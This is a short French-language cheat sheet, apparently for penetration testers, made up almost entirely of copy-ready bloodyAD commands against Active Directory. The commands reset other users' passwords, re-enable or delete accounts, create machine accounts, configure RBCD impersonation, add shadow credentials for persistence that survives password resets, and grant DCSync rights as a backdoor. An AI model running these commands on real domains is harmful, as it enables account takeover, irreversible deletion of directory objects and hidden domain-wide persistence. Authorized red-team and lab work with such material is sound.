Exploitation

BloodyAD Attacks

Manipulation LDAP directe : objets, ACLs, délégation et persistance via bloodyAD.

Manipulation d'objets

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS set object '$TARGET_USER' --attribute userPassword --value '$NEWPASS'

Description: Reset de mot de passe via LDAP : fonctionne si on a ForceChangePassword ou GenericAll.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS set object '$TARGET_USER' --attribute userAccountControl --value 512

Description: Réactiver un compte désactivé (UAC 512 = NORMAL_ACCOUNT) si on a WriteProperty.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add computer '$NEWPC$' '$PASS'

Description: Créer un compte machine si MAQ > 0 : utile pour les attaques RBCD.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS remove object '$TARGET'

Description: Supprimer un objet AD si on a DeleteChild sur son parent. Attention : irréversible.

Lecture de données sensibles

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get writable --detail

Description: Trouver tous les attributs modifiables par l'utilisateur courant sans scanner manuellement.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$TARGET' --attr msDS-KeyCredentialLink

Description: Lire les shadow credentials d'un compte : présence = compte sous contrôle potentiel.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get search --filter '(adminCount=1)' --attr sAMAccountName

Description: Lister tous les objets protégés par SDProp (adminCount=1) : cibles de privilège élevées.

Délégation & Persistance

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add rbcd '$TARGET_COMPUTER$' '$ATTACKER_COMPUTER$'

Description: Configurer RBCD sur la cible : l'attaquant peut s'y impersonate via S4U2Proxy.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add shadowCredentials '$TARGET_USER'

Description: Ajouter un KeyCredential : persistance discrète qui survit aux resets de mot de passe.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add dcsync '$USER'

Description: Accorder les droits DS-Replication-Get-Changes-All à un compte : backdoor DCSync.